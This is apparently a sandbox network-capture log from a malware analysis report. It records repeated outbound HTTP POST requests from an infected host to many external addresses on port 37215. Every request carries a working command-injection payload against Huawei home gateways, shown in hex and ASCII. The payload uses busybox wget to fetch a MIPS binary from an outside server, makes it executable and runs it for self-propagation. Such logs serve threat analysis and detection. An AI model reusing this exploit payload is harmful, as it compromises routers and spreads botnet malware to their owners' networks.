                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  93192.168.2.133304082.110.126.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061892033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  94192.168.2.1336838143.78.190.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061892033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.134196841.240.244.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061896086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.135752441.255.37.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061908007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.1344172197.169.30.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061913967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.13418784.166.145.4737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.061918974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.1335648197.126.8.7037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062215090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.1359944157.129.22.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062215090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.134338841.225.30.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062222004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.1352980197.32.137.9337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.062222004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 